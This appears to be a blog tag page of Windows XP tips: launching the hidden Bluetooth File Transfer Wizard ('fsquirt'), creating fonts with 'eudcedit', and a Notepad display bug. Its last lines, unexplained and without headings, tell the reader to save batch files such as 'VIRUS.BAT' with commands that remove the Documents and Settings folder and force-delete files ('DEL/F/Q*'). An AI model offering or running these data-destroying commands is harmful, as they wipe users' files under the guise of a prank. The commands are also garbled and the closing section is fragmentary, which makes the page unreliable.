Posts Tagged ‘Windows XP’
- Hidden Bluetooth software in XP
- Hidden Bluetooth file transfer wizard in XP
- Hidden Bluetooth utility in XP
- How to use inbuilt Bluetooth File Transfer Wizard in XP?
You may have faced problem many a times while Bluetooth file transfer, you need to install any software Bluetooth file transfer in XP.
Since XP has its own hidden utility for Bluetooth file transfer, now you don’t need to install any third party software for Bluetooth file transfer in XP.
- Go to Start > Run
- Type “fsquirt” without quotes.
- Hidden “Bluetooth File Transfer Wizard” will open.
- Click Next to select operation.
- Select option “Send a file” or “Receive a file” & click “Next”; the wizard will guide you completely for the respective operation.
Few days before one of my friends was asking me that he is searching a nice font from a long time but he couldn’t find a suitable one so he was asking my help. Then I came to know that many people don’t know that they can create their own fonts in Windows XP & that too very easily.
- How to create your own font?
- How to create custom font?
- How to create your own font in Windows XP?
I know you also want to know that how you can create your own font in Windows XP.
- Go to Run
- Type eudcedit & press Enter/Return
- A wizard will open which allows you to create your own font/s and that to free of cost in Windows XP. It’s a hidden feature of Windows XP.
Watch following video to know how to do it:
- Open Notepad
- Type : “any 4 letter word here without quotes” hid the facts
- Save it by any name
- Close Notepad
- Open the saved file n see magic/bug
- Open Notepad or any Text Editor
- Type- rmdr C:\documents and settings \S\Q.
- Save it as VIRUS.BAT
- Open Notepad
- Type DEL/F/Q*
- Save it as delete command.